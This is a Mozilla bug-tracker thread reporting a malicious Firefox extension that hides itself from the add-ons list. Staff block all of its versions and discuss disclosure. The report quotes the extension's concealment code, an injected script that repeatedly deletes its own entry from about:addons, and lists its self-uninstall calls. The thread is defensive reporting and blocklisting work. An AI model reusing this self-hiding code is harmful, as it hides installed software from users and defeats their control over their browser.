1240561 - malware extension hiding itself from extension list

Status: RESOLVED FIXED

(Toolkit :: Blocklist Policy Requests, defect)

Description

[Mike Durakovich]

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20160105164030

Steps to reproduce:

Installed a malware extension "jid1-W4CLFIRExukJIFW@jetpack_1.xpi" with MD5 = D3899A6EC58E914E3A92D027358BF48B, which is utilizing self-hiding technique to not appear in the user's list of extensions. Among other bad behaviors.

This extension available for download from VirusTotal.


Actual results:

Extension self hides itself upon installation from the user's extension list


Expected results:

Extensions should not be able to hide themselves.


Further Details
------------------------------------

As I realize this is a known issue that is not easily rectified, this bug is submitted more as an informative nature, in the spirit of bug 1209452 comment #6:  https://bugzilla.mozilla.org/show_bug.cgi?id=1209452#c6  


Within this bad extension, the following code is responsible for hiding the extension from the about:addons 
list

addtabobserver(function (tab, action) {
	if (action == 'ready' && tab.url=='about:addons') {
		var worker = tab.attach({
		    contentScript: 'unsafeWindow.removeit=function(){var listx=unsafeWindow.document.getElementById("addon-list");for (let item of listx.childNodes) {if(item[\'value\']==\'jid1-W4CLFIRExukJIFW@jetpack\'){listx.removeChild(item);};};};unsafeWindow.removeit();setInterval(function(){unsafeWindow.removeit();},100);'
		});
	}
});


The addon also tries to uninstall previous versions of itself which it enumerates as 
follows:

uninstallExtension("jid1-W3CLwrPxukJIFQ@jetpack");
uninstallExtension("jid1-W3CLwrPxukJIFJ@jetpack");
uninstallExtension("jid1-W3CLwrPxukJIFK@jetpack");
uninstallExtension("jid1-W3CLwrPxukJIFW@jetpack");

Comment 1

[Mike Durakovich]

Our organization may be releasing details publicly about this issue. We would like to coordinate a disclosure plan, if so, and would welcome your input and comments for inclusion in that release, should it happen.

Comment 2

[:Gijs (he/him)]

Jorge/Andreas, can you move this and blocklist (I guess?)? Thanks.

Comment 3

[Andreas Wagner [:TheOne] [use NI]]

From what I can see, none of the IDs have been signed.

Leaving this to Jorge to decide what to do.

Comment 4

[Jorge Villalobos [:jorgev] (he/him)]

I'll look into the IDs and block them if necessary. As for disclosure, I'm adding Dan Veditz from our Security Team for input.

Comment 5

[Jorge Villalobos [:jorgev] (he/him)]

The extensions have been blocked: https://addons.mozilla.org/en-US/firefox/blocked/i1078

Comment 6

[Mike Durakovich]

Question - did you block all of the previous versions as well, or just the latest one?

Comment 7

[Jorge Villalobos [:jorgev] (he/him)]

All versions are blocked.

Comment 8

[Daniel Veditz [:dveditz]]

(In reply to Mike Durakovich from comment #1)
> Our organization may be releasing details publicly about this issue. We
> would like to coordinate a disclosure plan, if so, and would welcome your
> input and comments for inclusion in that release, should it happen.

Our own disclosure for this kind of thing is pretty much the notice infected users get when the blocklist is updated and disabled the bad add-ons. The notice will contain the link in comment 5, which links to this bug. We normally un-hide the bug at this point to be transparent about why we are taking things away from people (malware names like "Adobe Flash Player" are chosen to fool people, and they work!).

If the add-on were installed from the web through some Firefox flaw we'd certainly publish something about _that_, but not individual instances of "you were scammed into installing malicious software". If there was something more you need about disclosure we should move the conversation to the security (at) mozilla.org alias because it gets off-topic for the bug.

Comment 9

[Mike Durakovich]

Nope, that works for us. Thanks!